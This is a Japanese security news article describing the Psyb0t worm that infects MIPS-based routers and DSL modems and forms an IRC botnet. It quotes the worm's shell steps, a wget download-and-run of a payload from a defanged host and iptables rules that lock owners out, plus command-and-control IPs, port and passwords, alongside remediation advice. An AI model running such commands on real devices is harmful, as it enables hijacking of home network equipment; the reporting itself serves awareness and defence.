SCAN DISPATCH :インフラ攻撃(1) 初のルータとDSLモデムを攻撃するボットネット・ワーム | ScanNetSecurity[国内最大級のサイバーセキュリティ専門ポータルサイト]
2017.08.23(水)

SCAN DISPATCH :インフラ攻撃(1) 初のルータとDSLモデムを攻撃するボットネット・ワーム

国際 海外情報

 SCAN DISPATCH は、アメリカのセキュリティ業界及ハッカーコミュニティから届いたニュースを、狭く絞り込み、深く掘り下げて掲載します。

──

 ダン・カミンスキーがDNSプロトコルの脆弱性を指摘してから一年ほど経つ。もともと学術用として開発されたインターネットで使用されているプロトコルの多くは、大幅なアップデートもされることなく現在でも使用されている。インターネットというインフラ自体の脆弱性をカミンスキー氏は指摘した訳だが、今回と次回の2回にわたって、インフラを対象とした新種の攻撃をレポートしたい。

 まずは、Psyb0t(サイボット)と呼ばれるルータ専用のワーム。ルータを攻撃対象としたボットネット・ワームはこれが初めてで、このワームは最初、主にオーストラリアで販売されているルータ Netcomm NB5に感染していることが発見され、1月にTerry Baume氏が論文を書いている。その後、攻撃に脆弱性を持つのは、「Linux mipselのルータで、ルータ管理インターフェイスがあるか、DMZにsshdかtelnetdができ、ユーザーネームとパスワードがデフォルトであるなど弱い組み合わせであるもの」ということが分かっている。mipselとは、MIPSがlittle-endian modeで動作しているもので、OpenWRT and DD-WRTなどのカスタムファームウェアを動作させているものも危ない。

 現在までに10万台のモデムが被害にあっていると、感染マシンの乱用を阻止することを目的にIPアドレスをリアルタイムで監視しているDroneBLでは推測している。

 さてその感染方法だが、まずワームはユーザーネームとパスワードを、ブルートフォース、パケット検査等の数種類の攻撃方法を使用して手に入れる。次にshellを使用する。そして

# rm -f /var/tmp/udhcpc.env
# wget

して、wget がある場合 hxxp://dweb.webhop.net/.bb/udhcpc.env をダウンロードしてこれを走らす。wget がない場合は、 "busybox ftpget" を探し出してtftpクライアントを使い、同様に上記プログラムをダウロードする。そして、

# iptables -A INPUT -p tcp ─dport 23 -j DROP
# iptables -A INPUT -p tcp ─dport 22 -j DROP
# iptables -A INPUT -p tcp ─dport 80 -j DROP

して、ユーザーをルータから排除する。

 これで分かるように、ルータが感染された症状としてポート23, 22, 80がブロックされてしまう。これらのポートがブロックされていたら、Psyb0tの感染と疑い、ルータをハードリセットし、パスワードを変更して最新のファームウェアにアップデートすることが必要だ。

 さて、一度ルータが感染されると、そのルータはIRCボットネットになってしまう。

Command and control server: strcpy.us.to
IP: 207.155.1.5 (master controller, Windstream Communications AS16687)
IP: 202.67.218.33 (backup controller? HKnet/REACH AS?????)
Port: 5050
Password: $!0@
Channel: #mipsel
Key: %#8b
NickPattern: [NIP]-[A-Z/0-9]{9}
BotController: DRS
DroneURL: hxxp://nenolod.net/~nenolod/psyb0t/udhcpc.env (backup copy, i did not write it)

 このPsyb0tについて、1月に論文を書いたTerry Baume氏によれば、
strcpy.us.toのサーバーは

strcpy.us.to = 202.71.102.110 (Malaysia)
strcpy.us.to = 202.67.218.33 (Hong Kong)
strcpy.us.to = 216.199.217.170 (USA)
strcpy.us.to = 207.155.1.5 (USA)

らのラウンドロビンになっているそうだ。

 オーストラリアのパーソナルコンピュータマガジン Apcmag では、最新のバージョン18では、30種類のLynksys、10種類のNetgear、そしてその他15種類のケーブルやDSLモデムのシェルコードを内蔵しているとレポートしており、ブルートフォース用のユーザーネームが全部で6,000個、パスワードも13,000個も含まれていたそうだ。

 さて面白いことに、このボットネット感染劇には以下のように、3月22日に終わっている…

【執筆:米国 笠原利香】

【関連リンク】
Terry Baume氏論文
http://www.adam.com.au/bogaurd/PSYB0T.pdf
DroneBLブログ
http://www.dronebl.org/blog/
APC Magazine記事
http://apcmag.com/Content.aspx?id=3687
Dan Kaminskyブログ
http://www.doxpara.com/?p=1283
──
※ この記事は Scan購読会員向け記事をダイジェスト掲載しました
購読会員登録案内 http://www.ns-research.jp/cgi-bin/ct/p.cgi?w02_ssw
《ScanNetSecurity》

Scan PREMIUM 会員限定

もっと見る

Scan PREMIUM 会員限定特集をもっと見る

Scan BASIC 会員限定記事

もっと見る

Scan BASIC 会員限定記事特集をもっと見る

[Web小説] サイバー探偵 工藤伸治の事件簿サーガ (シーズン 1~6 第1話)

もっと見る

[Web小説] サイバー探偵 工藤伸治の事件簿サーガ (シーズン 1~6 第1話)特集をもっと見る

カテゴリ別新着記事

国際 カテゴリの人気記事 MONTHLY ランキング

  1. 総資産 2,303 万 3,975 ドル、逮捕された Alphabay 運営者のずさんなセキュリティ管理 (The Register)

    総資産 2,303 万 3,975 ドル、逮捕された Alphabay 運営者のずさんなセキュリティ管理 (The Register)

  2. Black Hat、DEF CON、BSides 開催でホテルがビジネスセンターを真剣に閉鎖(The Register)

    Black Hat、DEF CON、BSides 開催でホテルがビジネスセンターを真剣に閉鎖(The Register)

  3. AWS 設定ミスでウォールストリートジャーナル購読者情報他 220 万件流出(The Register)

    AWS 設定ミスでウォールストリートジャーナル購読者情報他 220 万件流出(The Register)

  4. 来月ビットコインが消え去るかもしれないが、パニックに陥るべきではない(The Register)

  5. 「Tor 禁止令」を解く Facebook、暗号化の onion アクセスポイントを宣伝~これからは暗号化通信も完全に OK(The Register)

  6. 最大手の広告代理店が NotPetya の攻撃からいまだに立ち直れない原因(The Register)

  7. iCloudからの女優のプライベート画像流出事件、容疑者がフィッシングの罪を大筋で認める

  8. 専門家「隠されたパケットスニファのスパイ技術が、無数の iPhone と iPad に存在している」~「落ち着いて…Apple のバックドアは誰でも入れるほど大きく開いてはいない」重鎮は語る(The Register)

  9. 「過激派の」Tails や Tor を使っている? おめでとう、あなたは NSA のリストに載っている~Linux 情報サイトの読者や、プライバシーに関心を持つネット市民が標的にされているとの報告(The Register)

  10. Anonymousが幼児虐待の秘密の拠点を閉鎖~Tor小児愛者を攻撃し氏名を暴露(The Register)

全カテゴリランキング

★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★
<b>★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★</b>

経営課題としてサイバーセキュリティに取り組む情報システム部門や、研究・開発・経営企画に携わる方へ向けた、創刊19年のセキュリティ情報サービス Scan PREMIUM を、貴社の事業リスク低減のためにご活用ください。

×